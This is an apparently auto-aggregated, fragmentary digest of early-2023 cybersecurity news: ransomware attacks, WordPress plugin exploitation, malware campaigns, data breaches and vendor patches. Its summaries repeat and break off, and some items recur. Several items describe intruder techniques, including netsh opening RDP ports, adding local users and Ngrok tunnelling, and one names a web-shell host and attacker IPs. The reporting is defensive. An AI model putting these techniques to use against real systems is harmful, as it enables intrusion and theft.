WordPress ND Shortcodes For Visual Composer WP Live Chat Coming Soon Page and Maintenance Mode Hybrid Brizy WordPress Plugin FV Flowplayer Video Player WooCommerce WordPress Coming Soon Page WordPress theme OneTone Simple Fields WordPress Plugin WordPress Delucks SEO plugin Poll, Survey, Form & Quiz Maker by OpinionStage Social Metrics Tracker WPeMatico RSS Feed Fetcher Rich Reviews plugin Plugging the plugin gap Time and again, not updating a plugin comes back to haunt WordPress admins in the worst possible way. According to research by Dr Web, attacks rely on unpatched versions of the following plugins or themes: WP Live Chat Support Plugin WordPress – Yuzo Related Posts Yellow Pencil Visual Theme Customizer Plugin Easysmtp WP GDPR Compliance Plugin Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972) Thim Core Google Code Inserter Total Donations Plugin Post Custom Templates Lite WP Quick Booking Manager Facebook Live Chat by Zotabox Blog Designer WordPress Plugin WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233) "As enterprise adoption of the Apple platform accelerates, it’s important to note that Macs can and sometimes do get hit by ransomware. So it’s good to stay tuned to security concerns on a platform and application level — and take precautions.
With this in mind, extensive insights into Mac ransomware recently published only to be subsequently removed by Microsoft, can help explain these threats. The impact of such attack can be huge – ransomware already costs victims hundreds of billions each year, and no one is immune.
Autosummary:
" Security, security, security We can anticipate a great deal of activity around security on Apple’s Mac and mobile platforms this year. It also helps guide security first response if an attack does take place; in the case of some sophisticated attacks, it’s not enough to identify just one invasion vector, as once inside the systems, some will implant second- and even third-line bugs in case of detection.Apple partners, including Jamf, are also providing valuable Mac protection, and Apple itself recently launched a new security portal offering in-depth security insights. "HARMAN has unveiled that its Digital Transformation Solutions (DTS) business unit is introducing DefenSight Cybersecurity Platform to help enterprises keep their IT systems safe and secure using real-time threat intelligence analytics. DefenSight Cybersecurity Platform identifies vulnerable systems through continuous monitoring for compliance of enterprise IT systems against security policies. By triangulating internal systems data with external threat data in innovative ways, the new platform leverages artificial intelligence and machine learning technologies in order to reduce … More
The post HARMAN DefenSight Cybersecurity Platform helps enterprises protect IT systems appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"After information collection is complete, the extorted information is compressed into a ZIP file, encoded in Base64, and transmitted to the C2 server," ASEC researchers said. "Autosummary:
The Android malware family tracked as SpyNote (or SpyMax) has had a sudden increase in detections in the final quarter of 2022, which is attributed to a source code leak of one of its latest, known as "CypherRat." "CypherRat" combined SpyNote"s spying capabilities, such as offering remote access, GPS tracking, and device status and activity updates, with banking trojan features that impersonate banking institutions to steal account credentials. "Autosummary:
In one of them, the threat actor relied on multiple dual-use tools and utilities already available on the system: Quser for user discovery Ping for checking internet connectivity Ngrok for network tunneling Net localgroup /add for adding users Fortinet VPN client - likely for a secondary access channel Xcopy to copy RDP wrapper files Netsh to open port 3389 in the firewall The Autoupdatebat "Automatic RDP Wrapper installer and updater" tool to enable multiple concurrent RDP sessions on a system SC privs to modify SSH agent permissions - this could have been tampering for key theft or installation of another channel Although the last activity on the victim network was seen in September, the researchers say that the Ngrok tunneling tool was present until November, supporting Group-IB’s finding about OPERA1ER hackers sitting on the compromised networks for long periods (between three to twelve months). "Autosummary:
"The group makes extensive use of living-off-the-land, dual use tools, and commodity malware, with no custom malware deployed in this campaign," Symantec, a division of Broadcom Software, said in a report shared with The Hacker News. "Autosummary:
And perhaps that"s one reason why the notorious LockBit ransomware group, a ransomware-as-a-service (RaaS) operation that was used by the hospital"s attackers, has taken the unusual step of not only apologising to SickKids, but also offering the beleaguered hospital a free decryption tool. "The popular AI chatbot ChatGPT might be used by threat actors to hack easily hack into target networks. Original post at hxxps://cybernews.com/security/hackers-exploit-chatgpt/ Cybernews research team discovered that the AI-based chatbot ChatGPT – a recently launched platform that caught the online community’s attention – could provide hackers with step-by-step instructions on how to hack websites. Cybernews […]
The post <strong>How hackers might be exploiting ChatGPT</strong> appeared first on Security Affairs.
"Autosummary:
The social media was flooded with users’ queries and the AI’s responses – creating poems, plotting movies, copywriting, providing useful tips for losing weight or relationships, helping with creative brainstorming, studying, or even programming. ChatGPT (Generative Pre-trained Transformer) is the newest development in the AI field, created by research company OpenAI led by Sam Altman and backed by Microsoft, Elon Musk, LinkedIn Co-Founder Reid Hoffman, and Khosla Ventures. "Autosummary:
"We have already communicated our findings to these customers proactively, and importantly, according to Crowdstrike, there is no evidence that the threat actor actually viewed, obtained, misused, or disseminated any of the 27 Hosted Exchange customers" emails or data in the PSTs in any way. "Autosummary:
Decryptor"s options (BleepingComputer) Also, for those who attempted to decrypt their files previously with mixed success, the new decryptor offers an advanced setting to replace them with clean files. "Categories: News Tags: EMOI Services Tags: Owners Insurance Co Tags: Supreme Court of Ohio Tags: K. James Sullivan Tags: direct physical loss The Supreme Court of Ohio issued a ruling days before the New Year that software and service provider EMOI shouldn"t be covered by insurance against a ransomware attack. |
The post Software provider denied insurance payout after ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
" "I suspect we’re going to see an increasing number of losses to policyholders driven by twenty-first century fact patterns, such as pandemics, harm to computer systems, harm to air quality, etc., so it will be interesting to watch how the Ohio Supreme Court, insurers, and policyholders adapt going forward, Sullivan said. "Why schools, hospitals, local governments and other public sector organizations are in a sweet spot for ransomware attacks
The post Ransomware target list – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Autosummary:
"Autosummary:
" Some of the major RaaS players, who are notorious for turning the RaaS landscape into what it is today, are CryptoLocker, who infected over a quarter million systems in the 2000s and profited more than $3 million in less than four months, CryptoWall, who made over $18 million and prompted an FBI advisory, and finally Petya, NotPetya and WannaCry who used various types of exploits, ransomware included.Recommendations include: Turning off local passwords Using secure passwords Forcing the end of admin sessions Configuring group policies Checking privileged users" access Ensuring only necessary applications are running Limiting the reliance of Anti-Virus Installing EDRs 24 hour system admins Securing vulnerable ports Watching for misconfigured firewalls And more Etay Maor of Cato Networks highlights "Nothing in what several Ransomware groups say organizations need to do is new.In the past years, companies, universities, schools, medical facilities and other organizations have been targeted by ransomware threat actors, turning ransomware into the internet"s most severe security crisis. Here is a similar mapping of a Sodinokobi attack: Maze attack mapping to the MITRE framework: Another way to map ransomware attacks is through heat maps, which show how often different tactics and techniques are used. "Autosummary:
"US. rail and locomotive company Wabtec Corporation disclosed a data breach after it was hit with Lockbit ransomware attack. Wabtec Corporation is an American company formed by the merger of the Westinghouse Air Brake Company (WABCO) and MotivePower Industries Corporation in 1999. It manufactures products for locomotives, freight cars and passenger transit vehicles, and builds new locomotives up to 6,000 horsepower. The company employs […]
The post US. rail and locomotive company Wabtec hit with Lockbit ransomware appeared first on Security Affairs.
"Autosummary:
Compromised information varies by individual and includes a combination of the following data elements: First and Last Name, Date of Birth, Non-US National ID Number, Non-US Social Insurance Number or Fiscal Code, Passport Number, IP Address, Employer Identification Number (EIN), USCIS or Alien Registration Number, NHS (National Health Service) Number (UK), Medical Record/Health Insurance Information, Photograph, Gender/Gender Identity, Salary, Social Security Number (US), Financial Account Information, Payment Card Information, Account Username and Password, Biometric Information, Race/Ethnicity, Criminal Conviction or Offense, Sexual Orientation/Life, Religious Beliefs, Union Affiliation. "Researchers discovered a new Linux malware developed with the shell script compiler (shc) that was used to deliver a cryptocurrency miner. The ASEC analysis team recently discovered that a Linux malware developed with shell script compiler (shc) that threat actors used to install a CoinMiner. The experts believe attackers initially compromised targeted devices through a […]
The post New shc Linux Malware used to deploy CoinMiner appeared first on Security Affairs.
"Autosummary:
The experts believe attackers initially compromised targeted devices through a dictionary attack on poorly protected Linux SSH servers, then they installed multiple malware on the target system, including the Shc downloader, XMRig CoinMiner, and a Perl-based DDoS IRC Bot. "Autosummary:
"Autosummary:
When double-clicked, the ISO will mount itself as a new drive letter containing a legitimate copy of the Windows WerFault.exe executable, a DLL file ("faultrep.dll"), an XLS file ("File.xls"), and a shortcut file ("inventory & our specialties.lnk"). "Autosummary:
4. Use a password manager It’s also important for your organization to encourage the use of a password manager, not only for the individual end-user but to utilize shared vault features to prevent insecure password sharing among employees.Utilize MFA whenever possible To further secure end-user accounts, the implementation of multifactor authentication (MFA) should be mandatory for end-users logging into work apps, or making a change like resetting their passwords. Protect Company Equipment It’s easy, especially in a software-lead organization, to forget the importance of secure hardware.Express IT permission for all new downloads New software downloads should be limited, but if users have to download a program, even a web-based application, they should clear it with IT first. "Autosummary:
According to Kunze, a malicious hacker who has successfully linked his account to the targeted Google Home device can now execute commands remotely: controlling smart switches, making purchases online, remotely unlock doors and vehicles, or opening smart locks by brute-forcing a user"s PIN. "Fortinet addressed multiple vulnerabilities impacting its products and warned of a high-severity command injection flaw in FortiADC. Cybersecurity vendor Fortinet addressed several vulnerabilities impacting its products. The compaby also warned customers of a high-severity command injection flaw, tracked as CVE-2022-39947 (CVSS score of 8.6), affecting the Application Delivery Controller FortiADC. The CVE-2022-39947 flaw is an […]
The post Fortinet fixed multiple command injection bugs in FortiADC and FortiTester appeared first on Security Affairs.
"Autosummary:
"Autosummary:
If successful, the malware awaits commands from the IRC server, including DDoS-related actions such as TCP Flood, UDP Flood, and HTTP Flood, port scanning, Nmap scanning, sendmail commands, process killing, log cleaning, and more. "Autosummary:
Play ransomware activity (ID Ransomware) Unlike most ransomware operations, Play gang affiliates use email as a negotiation channel and will not provide victims with a link to a Tor negotiations page within ransom notes dropped on encrypted systems. "Categories: Exploits and vulnerabilities Categories: News Tags: Synology Tags: VPL Plus Server Tags: CVE-2022-43931 Tags: out-of-bounds write Synology has patched a critical vulnerability in the Remote Desktop feature of VPN Plus Server |
The post Update VPN Plus Server now! Synology patches vulnerability with a CVSS of 10 appeared first on Malwarebytes Labs.
"Autosummary:
The Synology VPN Plus Server is a business VPN that allows users to easily access and control client desktops within a network under a Synology Router, from anywhere, as long as they have Internet access, without further need of a client software. "The cybersecurity industry will undergo some significant changes in 2023. As more systems get connected, we can expect to see more outages. We probably won’t see a “digital Pearl Harbor,” but we will see more breaches, impact, and fear. How will this reshape the cybersecurity industry in the year ahead? Consolidation across the infosec industry Since the infosec sector is “hot,” investment has poured into it as everyone tries to get in on the action. … More
The post The cybersecurity industry will undergo significant changes in 2023 appeared first on Help Net Security.
"Autosummary:
For example, we had some valuable intelligence for an entire sector, went to the organization responsible for sharing info, and offered to provide it for free (literally write it an email, and they can share it).Tied to this, as budgets shrink, crazy salaries will no longer be paid, which is probably going to mean people think certs are a way to return to the crazy salary, and we end up with this vicious cycle. "MediaTek announced the latest chipset in the Genio platform for IoT devices, the octa-core Genio 700 designed for smart home, smart retail, and industrial IoT products. With a focus on power efficiency, the MediaTek Genio 700 is a N6 (6nm) IoT chipset that boasts two ARM A78 cores running at 2.2GHz and six ARM A55 cores at 2.0GHz while providing 4.0 TOPs AI accelerator. It comes with support for FHD60+4K60 display, as well as an … More
The post MediaTek introduces Genio 700 for industrial and smart home products appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"A post published on a popular hacking forum claims Volvo Cars has suffered a new data breach, alleging stolen data available for sale. French cybersecurity Anis Haboubi yesterday first noticed that a threat actor was attempting to sell data allegedly stolen from Volvo Cars on a popular hacking forum. A member of the forum, who […]
The post Does Volvo Cars suffer a new data breach? appeared first on Security Affairs.
"Autosummary:
“I am currently selling the following information: database access, CICD access, atlassian access, domain access, WiFi points and logins, auth bearers, API, PAC security access, employee lists, software licences and keys and system files.” reads the announcement on the hacking forum. "In 2022, ransomware attacks targeted 105 state or municipal governments or agencies in the US, reads a report published by Emsisoft. According to the “The State of Ransomware in the US: Report and Statistics 2022” report published by Emsisoft, the number of ransomware attacks against government, education and healthcare sector organizations is quite similar to […]
The post Ransomware attacks hit 105 US local governments in 2022 appeared first on Security Affairs.
"Autosummary:
Below are the attacks reported by Emsisoft: 105 local governments 44 universities and colleges 45 school districts operating 1,981 schools 25 healthcare providers operating 290 hospitals “When it comes to cybersecurity incidents, it has always been hard to get accurate statistical information.” "Autosummary:
"Autosummary:
"The Canadian Copper Mountain Mining Corporation (CMMC) was hit with a ransomware attack that impacted its operations. The Canadian Copper Mountain Mining Corporation (CMMC) announced to have suffered a ransomware attack late on December 27, 2022, which impacted its operation. Copper Mountain’s flagship asset is the 75% owned Copper Mountain mine located in southern British Columbia near […]
The post Canadian Copper Mountain Mining Corporation (CMMC) shut down the mill after a ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CMMC) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Experts warn of a new malware campaign using sensitive information stolen from a bank as a lure to spread the remote access trojan BitRAT. Qualys experts spotted a new malware campaign spreading a remote access trojan called BitRAT using sensitive information stolen from a bank as a lure in phishing messages. BitRAT is a relatively new […]
The post BitRAT campaign relies on stolen sensitive bank data as a lure appeared first on Security Affairs.
"Autosummary:
The researchers discovered that the threat actors had access to a database containing 4,18,777 rows of customers’ sensitive data, including Cedula numbers (Columbian national ID), email addresses, phone numbers, customer names, payment records, salary, address etc. "Autosummary:
A total of 418,777 records containing sensitive customer data, including names, phone numbers, email addresses, addresses, Colombian national IDs, payment records, and salary information, were stolen from the breached servers. "Autosummary:
" Currently, the HiQ website, "Digital Workplace", "eStudent", and Blackboard systems are unavailable, causing many courses and exams to be rescheduled until early February. "Autosummary:
Phishing step on the order page Source: BleepingComputer The victims are then given a choice to pay using Ethereum or Bitcoin cryptocurrency and are told that their order will be processed within 15 minutes after submission Choosing a payment method Source: BleepingComputer The listed wallet addresses have not received any payments, so either the particular shop hasn"t managed to trick any security researchers or used new wallets after each transaction. "Autosummary:
"High-profile ransomware news stories grabbed headlines a few years ago but faded in popularity as other attacks like cryptojacking grew more profitable. Since the first months of 2020, ransomware attacks have been on the rise and are in the news again. In this presentation, Dave Lewis, Global Advisory CISO at Cisco, talks about the historical rise and fall (and rise) of ransomware from floppy disks to RaaS (ransomware as a service), why it’s seen a … More
The post Ransomware: The security debt collector appeared first on Help Net Security.
"Autosummary:
"GreyNoise Intelligence unveiled its research report that dives deep into the most significant threat detection events of the past 12 months. “When it comes to cybersecurity, not all vulnerabilities are created equal, and many of the ones that garner media attention actually turn out to be insignificant,” said Bob Rudis, VP Research & Data Science, GreyNoise Intelligence. GreyNoise added over 230 new detection tags in 2022, representing an increase of approximately 38% from 2021. For … More
The post Attackers never let a critical vulnerability go to waste appeared first on Help Net Security.
"Autosummary:
"Autosummary:
WP-Matomo Integration (WP-Piwik) ND Shortcodes WP Live Chat Coming Soon Page and Maintenance Mode Hybrid Brizy FV Flowplayer Video Player WooCommerce Coming Soon Page & Maintenance Mode Onetone Simple Fields Delucks SEO Poll, Survey, Form & Quiz Maker by OpinionStage Social Metrics Tracker WPeMatico RSS Feed Fetcher, and Rich Reviews Both variants are said to include an unimplemented method for brute-forcing WordPress administrator accounts, although it"s not clear if it"s a remnant from an earlier version or a functionality that"s yet to see the light. "Poland security agency warns pro-Russian hackers that are continuously targeting the state since the start of the invasion of Ukraine. Since the beginning of the invasion of Ukraine, Poland has been a constant target of cyber attacks conducted by pro-Russian hackers, Poland’s security agency warns. The attacks aimed at almost any entity in Poland, including […]
The post Pro-Russia cyberattacks aim at destabilizing Poland, security agency warns appeared first on Security Affairs.
"Autosummary:
In April, the same group claimed the responsibility for DDoS attacks on the sites of institutions in states such as the USA, Estonia, Poland, the Czech Republic, and also on NATO sites. "Autosummary:
"Autosummary:
No clear picture on ransomware attacks Based on available data, the ransomware threat in the U.S. struck 105 counties, 44 universities and colleges, 45 school districts, and 24 healthcare providers. "Autosummary:
Applications using these libraries suddenly found their projects outputting gibberish messages on their console stating, "LIBERTY LIBERTY LIBERTY" followed by a sequence of non-ASCII characters: This change appears to have been introduced in retaliation against mega-corporations and commercial consumers of open-source projects who extensively rely on cost-free and community-powered software but do not, according to the developer, give back to the community.It was a big year for cybersecurity in 2022 with massive cyberattacks and data breaches, innovative phishing attacks, privacy concerns, and of course, zero-day vulnerabilities. "These are the most-read cybersecurity articles that have been published by SecurtiyAffairs in 2022. 1 – Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas Russian threat actors may be behind the explosion at a liquefied natural gas plant in Texas, the incident took place on June 8. 2 […]
The post SecurityAffairs Top 10 cybersecurity posts of 2022 appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Apology to SickKids on the LockBit data leak site Source: BleepingComputer The LockBit operation runs as a Ransomware-as-a-Service, where the operators maintain the encryptors and websites, and the operation"s affiliates, or members, breach victims" networks, steal data, and encrypt devices. "Autosummary:
It currently shows various documents, from memos to staff, payment forms, employee info, data on assets and expenses, financial data for partners, and passport scans. "The LockBit ransomware group formally apologized for the attack on the Hospital for Sick Children (SickKids) and gave to the victim a decryptor for free. The LockBit ransomware gang formally apologized for the attack on the Hospital for Sick Children (SickKids) and has released a free decryptor for the Hospital. The group is known to […]
The post Lockbit apologized for the attack on the SickKids pediatric hospital and releases a free decryptor appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Lockbit) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The number of DDoS attacks we see around the globe is on the rise, and that trend is likely to continue throughout 2023, according to Corero. We expect to see attackers deploy ever higher rate request-based or packets-per-second attacks. “DDoS attacks have historically focused around sending packets of large sizes with the aim to paralyze and disrupt the internet pipeline by exceeding the available bandwidth. Recent request-based attacks, however, are sending smaller size packets, to … More
The post Cybercriminals create new methods to evade legacy DDoS defenses appeared first on Help Net Security.
"Autosummary:
With the number of recorded attacks on the rise and significant shifts in attackers’ motives and goals, 2023 will require organizations to ensure they have robust DDoS defense in place,” said Lionel Chmilewsky, CEO at Corero Network Security. "Autosummary:
"Autosummary:
"US CISA added TIBCO Software’s JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog. US CISA added TIBCO Software’s JasperReports vulnerabilities, tracked as CVE-2018-5430 (CVSS score: 7.7) and CVE-2018-18809 (CVSS score: 9.9), to its Known Exploited Vulnerabilities (KEV) catalog,. TIBCO JasperReports is an open-source Java reporting tool for creating and managing reports and dashboards. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB […]
The post CISA adds JasperReports vulnerabilities to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Netgear addressed a high-severity bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC. Netgear fixed a bug affecting multiple WiFi router models, including Wireless AC Nighthawk, Wireless AX Nighthawk (WiFi 6), and Wireless AC router models. The vendor only said that the flaw is a pre-authentication buffer overflow vulnerability and urged […]
The post NETGEAR fixes a severe bug in its routers. Patch it asap! appeared first on Security Affairs.
"Autosummary:
Below is the list of fixes released by the company for the specific product models: RAX40 fixed in firmware version 1.0.2.60 RAX35 fixed in firmware version 1.0.2.60 R6400v2 fixed in firmware version 1.0.4.122 R6700v3 fixed in firmware version 1.0.4.122 R6900P fixed in firmware version 1.3.3.152 R7000P fixed in firmware version 1.3.3.152 R7000 fixed in firmware version 1.0.11.136 R7960P fixed in firmware version 1.4.4.94 R8000P fixed in firmware version 1.4.4.94 Below are step-by-step instructions to download the latest firmware for impacted router models: Visit NETGEAR Support. "The website for the Port of Lisbon is still down days after it was the target of a ransomware attack claimed by Lockbit group. The Port of Lisbon is the third-largest port in Portugal and one of the main European ports due to its strategic location. The website of the port was hit by a cyber attack on […]
The post Lockbit ransomware gang claims to have hacked the Port of Lisbon appeared first on Security Affairs.
"Autosummary:
“I would identify, with respect to our ports, cybersecurity, as a significant threat stream and we are of course very focused on defending against it and strengthening our cybersecurity.” "Autosummary:
"A new Linux malware has been exploiting 30 vulnerabilities in outdated WordPress plugins and themes to deploy malicious JavaScripts. Doctor Web researchers discovered a Linux malware, tracked as Linux.BackDoor.WordPressExploit.1, that compromises WordPress websites by exploiting 30 vulnerabilities in multiple outdated plugins and themes. The malware injects into targeted webpages malicious JavaScripts, then when users click on the compromised […]
The post New Linux malware targets WordPress sites by exploiting 30 bugs appeared first on Security Affairs.
"Autosummary:
The researchers also spotted a more recent version of the malware that exploits vulnerabilities in the following WordPress plugins: Brizy WordPress Plugin FV Flowplayer Video Player WooCommerce WordPress Coming Soon Page WordPress theme OneTone Simple Fields WordPress Plugin WordPress Delucks SEO plugin Poll, Survey, Form & Quiz Maker by OpinionStage Social Metrics Tracker WPeMatico RSS Feed Fetcher Rich Reviews plugin The researchers noticed that both trojan variants contain unimplemented functionality for hacking the administrator accounts of WordPress websites through a brute-force attack using special dictionaries. "Autosummary:
The ransomware gang claims to have stolen financial reports, audits, budgets, contracts, cargo information, ship logs, crew details, customer PII (personally identifiable information), port documentation, email correspondence, and more. "Avast CISO Jaya Baloo explains what quantum computing is, talks about its promises and potential pitfalls, and urges organizations to be pragmatic about preparing for its advent. She lays out the steps that can be taken immediately and those that can be planned for the near and far future. This video was recorded at IRISSCON 2022, an annual conference organized by IRISSCERT. The all-day event focuses on providing attendees with an overview of the current … More
The post Cybersecurity and quantum readiness appeared first on Help Net Security.
"Autosummary:
"The Lake Charles Memorial Health System (LCMHS) suffered a ransomware attack that impacted 270,000 patients. The Lake Charles Memorial Health System (LCMHS) disclosed a data breach that affected almost 270,000 patients at its medical centers. The Lake Charles Memorial Health System is the largest not-for-profit community healthcare system in Southwest Louisiana. LCMHS reported the incident to the secretary of the U.S. […]
The post LCMHS hospital suffered a Ransomware attack at Louisiana hospital that impacted 270,000 patients appeared first on Security Affairs.
"Autosummary:
The organizations launched an investigation into the incident with the help of forensic experts and discovered that threat actors have stolen files containing sensitive data, including: Full names Physical addresses Dates of birth Medical records Patient identification numbers Health insurance information Payment information Limited clinical information regarding the received care Social Security numbers (in some cases) The attackers had no access to electronic medical records. "Autosummary:
Firmware version 1.4.4.94 How to update your router"s firmware To download and install the latest firmware for your Netgear router, you have to go through the following steps: Visit NETGEAR Support. "What are some of the key cybersecurity trends and themes that organizations should have on their radars in 2023?
The post Cybersecurity trends and challenges to look out for in 2023 appeared first on WeLiveSecurity
"Autosummary:
"The third quarter of 2022, APWG observed 1,270,883 total phishing attacks — is the worst quarter for phishing that APWG has ever observed. The total for August 2022 was 430,141 phishing sites, the highest monthly total ever reported to APWG. Over recent years, reported phishing attacks submitted to APWG have more than quintupled since the first quarter of 2020, when APWG observed 230,554 attacks. The rise in Q3 2022 was attributable, in part, to increasing … More
The post Reported phishing attacks have quintupled appeared first on Help Net Security.
"Autosummary:
"Autosummary:
These files contained patient information such as: Full names Physical addresses Dates of birth Medical records Patient identification numbers Health insurance information Payment information Limited clinical information regarding the received care Social Security numbers (in some cases) LCMHS" announcement clarifies that its electronic medical records were out of reach for the network intruders. "Autosummary:
Royal ransomware Intrado data leak (BleepingComputer) Likely linked to an early December outage The date of the initial breach coincides with a widespread outage that impacted all of Intrado"s services, including Unified Communication Services, Healthcare, and Unified Communications as a Service (UCaaS). "Autosummary:
Among the products impersonated in these campaigns include Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird, and Brave. "In a time of increased remote work and growing cyber threats, SMEs face major cybersecurity challenges. Low-security budget, lack of employee awareness, management support, lack of cyber-skills, and increase in cyber-attacks can seriously impact SMEs’ competitiveness and compromise even the value chain they are connected to. ENISA’s main goal is to raise awareness among SMEs and educate them on cybersecurity hygiene and prominent cybersecurity threats. Georgia Bafoutsou, Cybersecurity Officer at ENISA, presents ENISA’s work to … More
The post SMEs: Boost awareness on cybersecurity – ENISA tools and guidance appeared first on Help Net Security.
"Autosummary:
"Misguided enterprise investment in multiple identity tools is proving insufficient in defending against today’s threat landscape, according to One Identity. 96% of companies report using multiple identity management tools, with 41% deploying at least 25 different systems to manage access rights. However, 70% of companies reported they’re paying for identity tools they’re not actively using. This investment in multiple disparate identity tools is having a direct impact on their overall security posture. Companies have acquired … More
The post Enterprises waste money on identity tools they don’t use appeared first on Help Net Security.
"Autosummary:
“Legacy approaches to identity and access management have caused organizations to adopt multiple identity solutions, and the lack of interoperability between these tools has a direct business and security impact,” said Mark Logan, CEO of One Identity. "Autosummary:
"Autosummary:
The suspicious transactions spotted by PeckShield include 4373 $BNB, 5.4M $USDT, 196k $DAI, and 1233.21 $ETH. "The past year has seen no shortage of disruptive cyberattacks – here’s a round-up of some of the worst hacks and breaches that have impacted a variety of targets around the world in 2022
The post 2022 in review: 10 of the year’s biggest cyberattacks appeared first on WeLiveSecurity
"Autosummary:
A CISA alert from September explained that Iran-affiliated threat actors compromised a US municipal government and an aerospace company, among other targets, by exploiting the infamous Log4Shell bug for ransomware campaigns, which isn’t all that common for state-backed entities.Stolen from a Swiss contractor, the data included details of individuals separated from their families due to conflict, migration and disaster, missing persons and their families, and people in detention.In September it was reported that a hacker, potentially a member of Lapsus$, had compromised email and cloud systems, code repositories, an internal Slack account and HackerOne tickets. "Autosummary:
"The shellcode employs several anti-analysis and anti-debugging tricks at every step of execution, throwing an error message if the shellcode detects any known analysis of debugging mechanisms," the researchers pointed out. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: LastPass says attackers got users’ info and password vault data The information couldn’t come at a worst time, as businesses are winding down their activities and employees and users are thick in the midst of last-minute preparations for end-of-year holidays. New Microsoft Exchange exploit chain lets ransomware attackers in (CVE-2022-41080) Ransomware-wielding attackers are using a new exploit chain that includes … More
The post Week in review: LastPass breach disaster, online tracking via UID smuggling, ransomware in 2023 appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: LastPass says attackers got users’ info and password vault data The information couldn’t come at a worst time, as businesses are winding down their activities and employees and users are thick in the midst of last-minute preparations for end-of-year holidays. "Threat actors are actively exploiting a critical flaw in the YITH WooCommerce Gift Cards Premium WordPress plugin installed by over 50,000 websites. Hackers are actively exploiting a critical vulnerability, tracked as CVE-2022-45359 (CVSS v3: 9.8), affecting the WordPress plugin YITH WooCommerce Gift Cards Premium. The YITH WooCommerce Gift Cards Premium plugin allows websites of online stores to […]
The post Experts warn of attacks exploiting WordPress gift card plugin appeared first on Security Affairs.
"Autosummary:
Below are some files uploaded by threat actors in attacks analyzed by Wordfence: kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location (shell[.]prinsh[.]com) – this file loads a copy of the “marijuana shell” file manager in memory from a remote location (shell[.]prinsh[.]com) b.php – this file is a simple uploader – this file is a simple uploader admin.php – this file is a password-protected backdoor Most of the attacks observed by Wordfence originated from 103.138.108.15 (19604 attacks against 10936 different sites) and 188.66.0.135 IP addresses (1220 attacks against 928 sites). "Threat actors are actively exploiting a critical flaw in the YITH WooCommerce Gift Cards Premium WordPress plugin installed by over 50,000 websites. Hackers are actively exploiting a critical vulnerability, tracked as CVE-2022-45359 (CVSS v3: 9.8), affecting the WordPress plugin YITH WooCommerce Gift Cards Premium. The YITH WooCommerce Gift Cards Premium plugin allows websites of online stores to […]
The post Experts warn of attacks exploiting WordPress gift card plugin appeared first on Security Affairs.
"Autosummary:
Error. "The Raspberry Robin worm attacks aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government office systems across Latin America, Australia, and Europe. The campaign has been active since at least September 2022, most of the infections have been observed in […]
The post Raspberry Robin malware used in attacks against Telecom and Governments appeared first on Security Affairs.
"Autosummary:
Raspberry Robin infection routine (Source Trend Micro) The worm was attributed by IBM to the cybercrime gang Evil Corp, however, it is used by multiple threat actors to deliver malicious payloads such as the Clop ransomware. "Autosummary:
RisePro attempts to steal a wide variety of data from applications, browsers, crypto wallets, and browser extensions, as listed below: Web browsers : Google Chrome, Firefox, Maxthon3, K-Melon, Sputnik, Nichrome, Uran, Chromodo, Netbox, Comodo, Torch, Orbitum, QIP Surf, Coowon, CatalinaGroup Citrio, Chromium, Elements, Vivaldi, Chedot, CentBrowser, 7start, ChomePlus, Iridium, Amigo, Opera, Brave, CryptoTab, Yandex, IceDragon, BlackHaw, Pale Moon, Atom. : Google Chrome, Firefox, Maxthon3, K-Melon, Sputnik, Nichrome, Uran, Chromodo, Netbox, Comodo, Torch, Orbitum, QIP Surf, Coowon, CatalinaGroup Citrio, Chromium, Elements, Vivaldi, Chedot, CentBrowser, 7start, ChomePlus, Iridium, Amigo, Opera, Brave, CryptoTab, Yandex, IceDragon, BlackHaw, Pale Moon, Atom. "The Raspberry Robin worm attacks aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government office systems across Latin America, Australia, and Europe. The campaign has been active since at least September 2022, most of the infections have been observed in […]
The post Raspberry Robin malware used in attacks against Telecom and Governments appeared first on Security Affairs.
"Autosummary:
Error. "When it comes to 2023 threat predictions, Trellix anticipates spikes in geopolitically motivated attacks across Asia and Europe, hacktivism fueled by tensions from opposing political parties, and vulnerabilities in core software supply chains. “Analyzing current trends is necessary but being predictive in cybersecurity is vital. While organizations focus on near-term threats, we advise all to look beyond the horizon to ensure a proactive posture,” said John Fokker, Head of Threat Intelligence, Trellix. “Global political events … More
The post Threat predictions for 2023: From hacktivism to cyberwar appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Also stolen is "basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass service," the company said. "Autosummary:
"Autosummary:
The binary file, for its part, functions as a backdoor that enables the threat actor to execute commands sent from an attacker-controlled domain, fetch and run additional payloads, take screenshots, and exfiltrate files. "Autosummary:
